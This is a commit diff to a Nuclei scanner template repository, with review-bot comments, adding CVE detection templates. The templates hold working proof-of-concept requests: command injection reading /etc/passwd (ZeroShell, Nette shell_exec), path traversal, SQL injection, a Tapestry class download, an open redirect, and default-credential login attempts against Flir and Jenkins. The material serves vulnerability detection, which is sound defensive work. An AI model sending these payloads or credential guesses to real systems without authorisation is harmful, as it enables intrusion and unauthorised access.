commit
a45af2f778
|
@ -8,7 +8,6 @@
|
|||
# unless asked for by the user.
|
||||
|
||||
tags:
|
||||
- "headless"
|
||||
- "dos"
|
||||
- "iot"
|
||||
- "misc"
|
||||
|
|
10
README.md
|
@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
|
|||
|
||||
| Templates | Counts | Templates | Counts | Templates | Counts |
|
||||
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
|
||||
| cves | 311 | vulnerabilities | 153 | exposed-panels | 127 |
|
||||
| takeovers | 67 | exposures | 99 | technologies | 67 |
|
||||
| misconfiguration | 62 | workflows | 30 | miscellaneous | 20 |
|
||||
| default-logins | 26 | exposed-tokens | 0 | dns | 8 |
|
||||
| cves | 318 | vulnerabilities | 159 | exposed-panels | 131 |
|
||||
| takeovers | 67 | exposures | 102 | technologies | 75 |
|
||||
| misconfiguration | 63 | workflows | 31 | miscellaneous | 22 |
|
||||
| default-logins | 28 | exposed-tokens | 0 | dns | 8 |
|
||||
| fuzzing | 9 | helpers | 8 | iot | 11 |
|
||||
|
||||
**105 directories, 1085 files**.
|
||||
**108 directories, 1120 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
|
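Review bot: the `exposed-tokens` row still reads 0 in both the old and the new table (fourth data row), so either that directory is empty and the row should be dropped, or the count was not regenerated; worth checking against the tree before the new `108 directories, 1120 files` totals are trusted.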
@ -0,0 +1,20 @@
|
|||
id: CVE-2009-0545
|
||||
|
||||
info:
|
||||
name: ZeroShell <= 1.0beta11 Remote Code Execution
|
||||
author: geeknik
|
||||
description: cgi-bin/kerbynet in ZeroShell 1.0beta11 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the type parameter in a NoAuthREQ x509List action.
|
||||
reference: https://www.exploit-db.com/exploits/8023
|
||||
severity: critical
|
||||
tags: cve,cve2009,zeroshell,kerbynet,rce
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
|
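Review bot: the matcher block has only the `root:[x*]:0:0:` regex and no status check, whereas CVE-2014-3744 in this same commit pairs the identical regex with `status: 200` under `matchers-condition: and`; use the same pair here so a non-200 response that happens to contain the pattern does not count as a hit. `reference:` should also use the list form the other new templates use rather than a bare string.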
@ -0,0 +1,25 @@
|
|||
id: CVE-2014-3744
|
||||
|
||||
info:
|
||||
name: Node.js st module Directory Traversal
|
||||
author: geeknik
|
||||
description: Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path.
|
||||
reference: |
|
||||
- https://github.com/advisories/GHSA-69rr-wvh9-6c4q
|
||||
- https://snyk.io/vuln/npm:st:20140206
|
||||
severity: high
|
||||
tags: cve,cve2014,lfi,nodejs,st
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
|
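Review bot: the request hard-codes the `/public/` mount point, but the description itself says the traversal is via "an unspecified path" because st is mounted wherever the application chooses, so this only finds the default layout; say so in the description. The status-200-plus-passwd matcher pair is identical to the one in the Impacket template removed later in this commit, and this template is where it belongs.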
@ -8,10 +8,7 @@ info:
|
|||
- https://www.exploit-db.com/exploits/47760
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-17270
|
||||
description: |
|
||||
Yachtcontrol software is being used for controlling several aspects on yachts, as the name implies. Having access to the webapplication,
|
||||
it's possible to control several items such as lights, powergenerator, solarcontrol, airco, wipers, heating and other components
|
||||
Websoftware is built in PHP and mostly runs on a Linux based firmware device, controlling several other components related to the Yacht
|
||||
Other related software running on the same firmware device are custom compiled ELF binaries for controlling related onboard devices
|
||||
A vulnerability in Yachtcontrol makes it possible to perform direct Operating System commands as an unauthenticated user via the "/pages/systemcall.php?command={COMMAND}" page and parameter, where {COMMAND} will be executed and returning the results to the client. Affects Yachtcontrol webservers disclosed via Dutch GPRS/4G mobile IP-ranges. IP addresses vary due to DHCP client leasing of telco's.
|
||||
tags: rce,yachtcontrol,cve,cve2019
|
||||
|
||||
requests:
|
||||
|
|
|
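Review bot: the last line of the `description: |` block ("Affects Yachtcontrol webservers disclosed via Dutch GPRS/4G mobile IP-ranges. IP addresses vary due to DHCP client leasing of telco's.") is the original advisory's target-discovery remark, not a description of the flaw; keep the sentence about `/pages/systemcall.php?command=` and drop the rest. The preceding lines also need terminal punctuation and spaces in "webapplication" and "powergenerator".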
@ -0,0 +1,29 @@
|
|||
id: CVE-2020-15227
|
||||
|
||||
info:
|
||||
name: Nette Framework RCE
|
||||
author: becivells
|
||||
severity: high
|
||||
description: Nette versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, 3.0.6 are vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE. Nette is a PHP/Composer MVC Framework.
|
||||
reference: |
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-15227
|
||||
- https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94
|
||||
- https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E#
|
||||
- https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md
|
||||
tags: cve,cve2020,nette,rce
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
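Review bot: grammar in `description`: "vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE" should read "vulnerable to a code injection attack by passing specially formed parameters in the URL, possibly leading to RCE". The fourth reference is a pinned third-party PoC markdown file; the nette advisory (GHSA-8gv3-3j7f-wg94) and the NVD entry already cover the issue, so that link can go.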
@ -0,0 +1,33 @@
|
|||
id: CVE-2020-36112
|
||||
|
||||
info:
|
||||
name: CSE Bookstore 1.0 SQL Injection
|
||||
author: geeknik
|
||||
description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successfull exploitation of this vulnerability will lead to an attacker dumping the entire database.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/49314
|
||||
- https://www.tenable.com/cve/CVE-2020-36112
|
||||
severity: critical
|
||||
tags: cve,cve2020,sqli,cse
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
DNT: 1
|
||||
Connection: close
|
||||
Cookie: PHPSESSID=c4qd3glr3oe6earuf88sub6g1n
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "get book price failed! You have an error in your SQL syntax"
|
||||
- "Can't retrieve data You have an error in your SQL syntax"
|
||||
condition: or
|
|
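Review bot: the raw request carries a captured browser session (`Cookie: PHPSESSID=c4qd3glr3oe6earuf88sub6g1n`, plus the DNT, Upgrade-Insecure-Requests and Accept-* headers) that means nothing against any other host; keep only the request line, Host and a User-Agent. Also fix "successfull" in the description, and consider a `status` matcher, since the word match currently relies solely on the MySQL error text being echoed in the body.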
@ -6,7 +6,7 @@ info:
|
|||
severity: high
|
||||
description: Currently, all versions of MAGMI are vulnerable to CSRF due to the lack of CSRF tokens. RCE (via phpcli command) is possible in the event that a CSRF is leveraged against an existing admin session for MAGMI.
|
||||
reference: https://www.tenable.com/security/research/tra-2020-51
|
||||
tags: cve,cve2020,magmi
|
||||
tags: cve,cve2020,magmi,magento
|
||||
|
||||
# Due to the lack of CSRF tokens, RCE (via phpcli command) is possible
|
||||
# in the event that a CSRF is leveraged against an existing admin session for MAGMI.
|
||||
|
|
|
@ -6,7 +6,7 @@ info:
|
|||
severity: high
|
||||
description: MAGMI versions prior to 0.7.24 are vulnerable to a remote authentication bypass due to allowing default credentials in the event there is a database connection failure.
|
||||
reference: https://github.com/dweeves/magmi-git/blob/18bd9ec905c90bfc9eaed0c2bf2d3525002e33b9/magmi/inc/magmi_auth.php#L35
|
||||
tags: cve,cve2020,magmi
|
||||
tags: cve,cve2020,magmi,magento
|
||||
|
||||
# Response code 503 indicates a potential successful "Too many connections" error
|
||||
# While the Db connection is down, you can access http://[TARGET]/magmi/web/magmi.php
|
||||
|
|
|
@ -4,7 +4,20 @@ info:
|
|||
name: ZyXEL NAS RCE
|
||||
author: dhiyaneshDk
|
||||
severity: critical
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-9054
|
||||
description: |
|
||||
Multiple ZyXEL network-attached storage (NAS) devices running firmware version 5.21 contain a pre-authentication command injection vulnerability, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable device.
|
||||
ZyXEL NAS devices achieve authentication by using the weblogin.cgi CGI executable. This program fails to properly sanitize the username parameter that is passed to it.
|
||||
If the username parameter contains certain characters, it can allow command injection with the privileges of the web server that runs on the ZyXEL device.
|
||||
Although the web server does not run as the root user, ZyXEL devices include a setuid utility that can be leveraged to run any command with root privileges.
|
||||
As such, it should be assumed that exploitation of this vulnerability can lead to remote code execution with root privileges.
|
||||
By sending a specially-crafted HTTP POST or GET request to a vulnerable ZyXEL device, a remote, unauthenticated attacker may be able to execute arbitrary code on the device.
|
||||
This may happen by directly connecting to a device if it is directly exposed to an attacker.
|
||||
However, there are ways to trigger such crafted requests even if an attacker does not have direct connectivity to a vulnerable devices.
|
||||
For example, simply visiting a website can result in the compromise of any ZyXEL device that is reachable from the client system.
|
||||
Affected products include: NAS326 before firmware V5.21(AAZF.7)C0 NAS520 before firmware V5.21(AASZ.3)C0 NAS540 before firmware V5.21(AATB.4)C0 NAS542 before firmware V5.21(ABAG.4)C0 ZyXEL has made firmware updates available for NAS326, NAS520, NAS540, and NAS542 devices. Affected models that are end-of-support: NSA210, NSA220, NSA220+, NSA221, NSA310, NSA310S, NSA320, NSA320S, NSA325 and NSA325v2
|
||||
reference: |
|
||||
- https://krebsonsecurity.com/2020/02/zyxel-fixes-0day-in-network-storage-devices/
|
||||
- https://www.zyxel.com/support/remote-code-execution-vulnerability-of-NAS-products.shtml
|
||||
tags: cve,cve2020,rce
|
||||
|
||||
requests:
|
||||
|
|
|
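Review bot: the old `reference: https://nvd.nist.gov/vuln/detail/CVE-2020-9054` line goes away while the new `reference: |` list only carries the Krebs and ZyXEL links; keep the NVD link in the list. In the description block, the "Affected products include:" line runs four model/firmware pairs together with no separators, so give each `NASxxx before firmware ...` its own line.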
@ -1,10 +1,10 @@
|
|||
id: CVE-2020-9490
|
||||
|
||||
info:
|
||||
name: CVE-2020-9490 Apache HTTP Server versions 2.4.20 to 2.4.43. A specially crafted value for the 'Cache-Digest' header in a HTTP/2 request would result in a crash when the server actually tries to HTTP/2 PUSH a resource afterwards. Configuring the HTTP/2 feature via "H2Push off" will mitigate this vulnerability for unpatched servers.
|
||||
author: philippedelteil
|
||||
name: CVE-2020-9490
|
||||
severity: medium
|
||||
description: Detects apache versions 2.4.43, 2.4.39, 2.4.38, 2.4.37, 2.4.35, 2.4.34, 2.4.33, 2.4.30, 2.4.29, 2.4.28, 2.4.27, 2.4.26, 2.4.25, 2.4.23, 2.4.20 that are POTENTIALLY vulnerable to CVE-2020-9490
|
||||
description: Apache HTTP Server versions 2.4.20 to 2.4.43. A specially crafted value for the 'Cache-Digest' header in a HTTP/2 request would result in a crash when the server actually tries to HTTP/2 PUSH a resource afterwards. Configuring the HTTP/2 feature via "H2Push off" will mitigate this vulnerability for unpatched servers.
|
||||
author: philippedelteil
|
||||
tags: cve,cve2020,apache,dos
|
||||
reference: |
|
||||
- https://httpd.apache.org/security/vulnerabilities_24.html
|
||||
|
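Review bot: the new `name: CVE-2020-9490` drops the descriptive title, and the new description drops the old one's caveat that the check only flags versions that are POTENTIALLY vulnerable. Since the template matches nothing but the `Apache/2.4.x` banner in the header, that caveat should survive (for example "Version-based check: Apache HTTP Server 2.4.20 to 2.4.43 ..."), and a name along the lines of "Apache HTTP Server HTTP/2 Cache-Digest DoS (version check)" is more useful in output than the bare CVE id.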
@ -18,22 +18,7 @@ requests:
|
|||
- "{{BaseURL}}"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "Apache/2.4.20"
|
||||
- "Apache/2.4.23"
|
||||
- "Apache/2.4.25"
|
||||
- "Apache/2.4.26"
|
||||
- "Apache/2.4.27"
|
||||
- "Apache/2.4.28"
|
||||
- "Apache/2.4.29"
|
||||
- "Apache/2.4.30"
|
||||
- "Apache/2.4.33"
|
||||
- "Apache/2.4.34"
|
||||
- "Apache/2.4.35"
|
||||
- "Apache/2.4.37"
|
||||
- "Apache/2.4.38"
|
||||
- "Apache/2.4.39"
|
||||
- "Apache/2.4.43"
|
||||
- type: regex
|
||||
regex:
|
||||
- "Apache/2\\.4\\.([3-3][0-9]|2[0-9]|4[0-3])"
|
||||
part: header
|
||||
condition: or
|
||||
|
|
|
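Review bot: in the new regex `Apache/2\\.4\\.([3-3][0-9]|2[0-9]|4[0-3])`, `[3-3]` is a one-character range and should just be `3`; `Apache/2\\.4\\.(2[0-9]|3[0-9]|4[0-3])\\b` reads as the intended 2.4.20 to 2.4.43 span, and the trailing `\\b` stops a longer patch number from matching on its first two digits. The `condition: or` left over from the old word matcher is redundant on a single-pattern regex matcher.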
@ -0,0 +1,27 @@
|
|||
id: CVE-2021-24176
|
||||
|
||||
info:
|
||||
name: WordPress JH 404 Logger XSS
|
||||
author: Ganofins
|
||||
severity: medium
|
||||
description: JH 404 Logger WordPress plugin through 1.1 doesn't sanitise the referer and path of 404 pages, when they are output in the dashboard, which leads to executing arbitrary JavaScript code in the WordPress dashboard.
|
||||
references: |
|
||||
- https://wpscan.com/vulnerability/705bcd6e-6817-4f89-be37-901a767b0585
|
||||
- https://wordpress.org/plugins/jh-404-logger/
|
||||
tags: cve,cve2021,wordpress,wp-plugin,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/jh-404-logger/readme.txt"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "JH 404 Logger"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
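Review bot: the key is `references:` while every other template in this commit uses `reference:`, so these links land under a different info key; rename it. The request only fetches the plugin's readme.txt, so the finding reads "JH 404 Logger XSS" for every install although the description limits the issue to versions "through 1.1"; either extract the `Stable tag:` line from the readme and compare it, or word the name and description as a plugin-presence check.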
@ -0,0 +1,57 @@
|
|||
id: CVE-2021-27850
|
||||
|
||||
info:
|
||||
name: Apache Tapestry - Arbitrary class download
|
||||
description: |
|
||||
A critical unauthenticated remote code execution vulnerability was found all recent versions of Apache Tapestry. The affected versions include 5.4.5, 5.5.0, 5.6.2 and 5.7.0. The vulnerability I have found is a bypass of the fix for CVE-2019-0195. Recap: Before the fix of CVE-2019-0195 it was possible to download arbitrary class files from the classpath by providing a crafted asset file URL.
|
||||
author: pdteam
|
||||
severity: critical
|
||||
reference: |
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-27850
|
||||
tags: cve,cve2021,apache,tapestry
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /assets/app/something/services/AppModule.class/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{BaseURL}}
|
||||
Connection: close
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
- |
|
||||
GET /assets/app/{{id}}/services/AppModule.class/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{BaseURL}}
|
||||
Connection: close
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
regex:
|
||||
- '\/assets\/app\/([a-z0-9]+)\/services\/AppMod'
|
||||
internal: true
|
||||
name: id
|
||||
part: header
|
||||
group: 1
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- 'application/java'
|
||||
part: header
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- 'configuration'
|
||||
- 'webtools'
|
||||
part: body
|
||||
condition: and
|
|
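Review bot: `description` needs "was found in all recent versions" and should not keep the advisory author's first person ("The vulnerability I have found is a bypass ..."); "The issue is a bypass of the fix for CVE-2019-0195" says the same thing. The description leads with remote code execution while `name` says "Arbitrary class download"; the matchers only confirm an `application/java` class download, so the name is the accurate one and the description should present the download as the primitive the RCE chain builds on.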
@ -0,0 +1,20 @@
|
|||
id: CVE-2021-29622
|
||||
|
||||
info:
|
||||
name: Prometheus v2.23.0 to v2.26.0, and v2.27.0 Open Redirect
|
||||
author: geeknik
|
||||
description: In 2.23.0, Prometheus changed its default UI to the New ui. To ensure a seamless transition, the URL's prefixed by /new redirect to /. Due to a bug in the code, it is possible for an attacker to craft an URL that can redirect to any other URL, in the /new endpoint.
|
||||
reference: https://github.com/prometheus/prometheus/security/advisories/GHSA-vx57-7f4q-fpc7
|
||||
severity: medium
|
||||
tags: cve,cve2021,prometheus,redirect
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/new/newhttp://example.com"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
|
||||
part: header
|
|
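Review bot: `description` wording: "the URL's prefixed by /new redirect to /" should be "URLs prefixed by /new redirect to /", and "craft an URL" should be "craft a URL". The Location regex is correctly scoped with `part: header`; adding an explicit `redirects: false` to the request documents that the redirect must not be followed, since following it would remove the header the matcher depends on.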
@ -4,7 +4,7 @@ info:
|
|||
name: VoipMonitor Pre-Auth-RCE
|
||||
author: shifacyclewala,hackergautam
|
||||
severity: critical
|
||||
description: A malicious actor can trigger Un authenticated Remote Code Execution using CVE-2021-30461.
|
||||
description: Use of user supplied data, arriving via web interface allows remote unauthenticated users to trigger a remote PHP code execution vulnerability in VoIPmonitor.
|
||||
tags: cve,cve2021,rce,voipmonitor
|
||||
reference: https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/
|
||||
|
||||
|
|
|
@ -1,23 +0,0 @@
|
|||
id: CVE-2021-31800
|
||||
|
||||
info:
|
||||
name: Impacket directory traversal
|
||||
author: geeknik
|
||||
description: Multiple path traversal vulnerabilities exist in smbserver.py in Impacket through 0.9.22. An attacker that connects to a running smbserver instance can list and write to arbitrary files via ../ directory traversal. This could potentially be abused to achieve arbitrary code execution by replacing /etc/shadow or an SSH authorized key.
|
||||
reference: https://github.com/SecureAuthCorp/impacket/pull/1066
|
||||
severity: high
|
||||
tags: impacket,cve,cve2021,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
|
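Review bot: removing this template is right. CVE-2021-31800 is a path traversal in Impacket's smbserver.py, an SMB service, yet the request here was an HTTP GET for `/public/%2e%2e/.../etc/passwd` with the same status-200-plus-passwd matchers as the st module template (CVE-2014-3744) added in this commit, so it could only ever report st findings under the wrong CVE id.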
@ -3,6 +3,7 @@ info:
|
|||
name: DVWA Default Login
|
||||
author: pdteam
|
||||
severity: critical
|
||||
tags: dvwa,default-login
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -0,0 +1,41 @@
|
|||
id: flir-default-credentials
|
||||
|
||||
info:
|
||||
name: Flir Default Credentials
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
tags: default-login,flir
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /login/dologin HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Length: 35
|
||||
Accept: */*
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
|
||||
Connection: closen
|
||||
|
||||
user_name=admin&user_password=admin
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- '"success"'
|
||||
|
||||
- type: dsl
|
||||
dsl:
|
||||
- contains(tolower(all_headers), 'text/html')
|
||||
- contains(tolower(all_headers), 'phpsessid')
|
||||
- contains(tolower(all_headers), 'showcameraid')
|
||||
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
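Review bot: `Connection: closen` in the raw request is a typo for `Connection: close`; as written the header value is invalid and the connection may be kept alive. `Content-Length: 35` does match the 35-byte body `user_name=admin&user_password=admin`, so that part is fine, but the blank line between the `dsl:` list and `condition: and` makes the indentation of `condition` ambiguous at a glance; put it directly under the list.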
@ -0,0 +1,50 @@
|
|||
id: jenkins-weak-password
|
||||
|
||||
info:
|
||||
name: Jenkins Weak Password
|
||||
author: Zandros0
|
||||
severity: high
|
||||
tags: jenkins,default-login
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /j_spring_security_check HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: {{cookie}}
|
||||
|
||||
j_username=admin&j_password=admin&from=%2F&Submit=Sign+in
|
||||
|
||||
- |
|
||||
POST /j_spring_security_check HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: {{cookie}}
|
||||
|
||||
j_username=jenkins&j_password=password&from=%2F&Submit=Sign+in
|
||||
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Cookie: {{cookie}}
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: cookie
|
||||
internal: true
|
||||
part: header
|
||||
regex:
|
||||
- 'JSESSIONID\..*=([a-z0-9.]+)'
|
||||
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body_4, "/logout")'
|
||||
- 'contains(body_4, "Dashboard [Jenkins]")'
|
||||
condition: and
|
|
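Review bot: the extractor regex `JSESSIONID\..*=([a-z0-9.]+)` is greedy, so on a Set-Cookie line that carries another `name=value` attribute (Max-Age, for instance) the match runs past the session value; `JSESSIONID\.[^=;]+=([a-z0-9.]+)` keeps it to the cookie itself. The matchers inspect only `body_4`, so a hit cannot say whether `admin:admin` or `jenkins:password` is the working pair; checking `body_2` and `body_3` for the absence of the login error, or splitting into one template per pair, makes the finding actionable.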
@ -22,11 +22,16 @@ requests:
|
|||
- type: word
|
||||
words:
|
||||
- '"code":200'
|
||||
- '"msg"'
|
||||
- '"content"'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- 'application/json'
|
||||
- 'XXL_JOB_LOGIN_IDENTITY'
|
||||
part: header
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -0,0 +1,30 @@
|
|||
id: exposed-nomad
|
||||
|
||||
info:
|
||||
name: Exposed Nomad Jobs
|
||||
author: pdteam
|
||||
severity: high
|
||||
tags: nomad,devops,hashicorp
|
||||
reference: https://www.nomadproject.io/docs/internals/security
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/ui/jobs"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "Nomad"
|
||||
- "nomad-ui"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "text/html"
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
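Review bot: `severity: high` and the name "Exposed Nomad Jobs" overstate what the matchers establish: `/ui/jobs` returning an HTML shell containing "Nomad" and "nomad-ui" is true of every reachable Nomad UI, including clusters with ACLs enabled, because the job list is fetched by the UI from the API afterwards. To report actual job exposure, request `/v1/jobs` and match a JSON array with an `application/json` header; otherwise keep this as an info-level "Nomad UI detected" template.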
@ -0,0 +1,21 @@
|
|||
id: jenkins-login
|
||||
|
||||
info:
|
||||
name: Jenkins Login
|
||||
author: pdteam
|
||||
severity: info
|
||||
tags: panel,jenkins
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/login'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- 'Sign in [Jenkins]'
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,25 @@
|
|||
id: magento-admin-panel
|
||||
|
||||
info:
|
||||
name: Exposed Magento Admin Panel
|
||||
author: TechbrunchFR
|
||||
severity: info
|
||||
description: As a security best practice, Magento recommends that you use a unique, custom Admin URL instead of the default admin or a common term such as backend. Although it will not directly protect your site from a determined bad actor, it can reduce exposure to scripts that try to gain unauthorized access.
|
||||
reference: https://docs.magento.com/user-guide/stores/store-urls-custom-admin.html
|
||||
tags: magento
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/admin'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 302
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "/admin/index/index/key/"
|
||||
part: header
|
|
@ -25,9 +25,6 @@ requests:
|
|||
- "{{BaseURL}}/wp-config.php.bak"
|
||||
- "{{BaseURL}}/wp-login.php.bak"
|
||||
|
||||
redirects: true
|
||||
max-redirects: 1
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
|
|
|
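Review bot: if the three removed lines are `redirects: true`, `max-redirects: 1` and their blank line, that is the right call for a backup-file check: following a redirect to the site's 404 or login page would turn a non-existent `wp-config.php.bak` into a 200 hit for the status matcher below.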
@ -3,7 +3,7 @@ info:
|
|||
name: Magento Config Disclosure
|
||||
author: geeknik
|
||||
severity: medium
|
||||
tags: config,exposure
|
||||
tags: config,exposure,magento
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -12,6 +12,7 @@ requests:
|
|||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/.netrc"
|
||||
- "{{BaseURL}}/_netrc"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -0,0 +1,26 @@
|
|||
id: ioncube-loader-wizard
|
||||
|
||||
info:
|
||||
name: Ioncube Loader Wizard disclosure
|
||||
author: Mubassirpatel
|
||||
severity: medium
|
||||
description: ioncube-loader-wizard is vulnerable to xss,phpinfo, etc.
|
||||
reference: https://firefart.at/post/multiple-vulnerabilities-in-ioncube-loader-wizard/
|
||||
tags: ioncube,disclosure,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/ioncube/loader-wizard.php"
|
||||
- "{{BaseURL}}/loader-wizard.php"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "ionCube Loader Wizard"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
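Review bot: `description: ioncube-loader-wizard is vulnerable to xss,phpinfo, etc.` is vague, and the template does not test any of it: the matchers only confirm that the wizard page ("ionCube Loader Wizard", status 200) is reachable. Reword along the lines of "Detects an exposed ionCube loader wizard (loader-wizard.php); the linked advisory documents phpinfo() disclosure and XSS in it, and the file should be removed after installation" so the finding matches what was checked.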
